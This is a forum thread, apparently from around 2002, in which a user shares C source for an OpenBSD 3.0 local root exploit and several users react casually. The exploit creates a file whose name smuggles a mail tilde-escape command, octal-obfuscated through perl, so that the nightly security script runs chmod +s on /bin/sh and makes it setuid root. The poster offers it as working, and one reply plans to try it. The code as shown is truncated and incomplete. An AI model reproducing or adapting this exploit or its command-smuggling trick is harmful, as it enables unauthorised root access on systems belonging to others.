OpenBSD local root exploit
Results 1 to 5 of 5

Thread: OpenBSD local root exploit

  1. #1
    Senior Member linuxcomando's Avatar
    Join Date
    Sep 2001

    OpenBSD local root exploit

    Found this local root exploit for OpenBSD 3.0 works pretty well.

    * (c) 2002
    * OpenBSD 3.0 (before 08 Apr 2002)
    * /etc/security + /usr/bin/mail local root exploit
    * Run the exploit and wait for /etc/daily executed from crontab.
    * /bin/sh will be suid root next day morning.
    * Credit goes to for discovering vulnerability.

    #include <fcntl.h>

    int main(void)
    int fd;

    fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777);

    if (fd)

  2. #2
    AntiOnline Senior Member souleman's Avatar
    Join Date
    Oct 2001
    Flint, MI
    Kinda reminds me of the cucus (or howerver it was spelled) egg. You set it up, then you have to wait. This one just takes a lot longer.
    \"Ignorance is bliss....
    but only for your enemy\"
    -- souleman

  3. #3
    Senior Member linuxcomando's Avatar
    Join Date
    Sep 2001
    Kind of reminds me of like a timebomb exploit/virus
    I toor\'d YOU!

  4. #4
    Computer Forensics
    Join Date
    Jul 2001
    hrm interesting that its in /etc/security...........I wonder if it will work if the permissions are set like they should be for that .............
    I will have to try it out.
    Antionline in a nutshell
    \"You\'re putting the fate of the world in the hands of a bunch of idiots I wouldn\'t trust with a potato gun\"

    Trust your Technolust

  5. #5
    Senior Member
    Join Date
    Apr 2002
    Hmmm... that's rather interesting... time to go look at my OpenBSD box, I guess.

    Like the Octal "obfuscation" there... LOL
    \"Windows has detected that a gnat has farted in the general vicinity. You must reboot for changes to take affect. Reboot now?\"

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts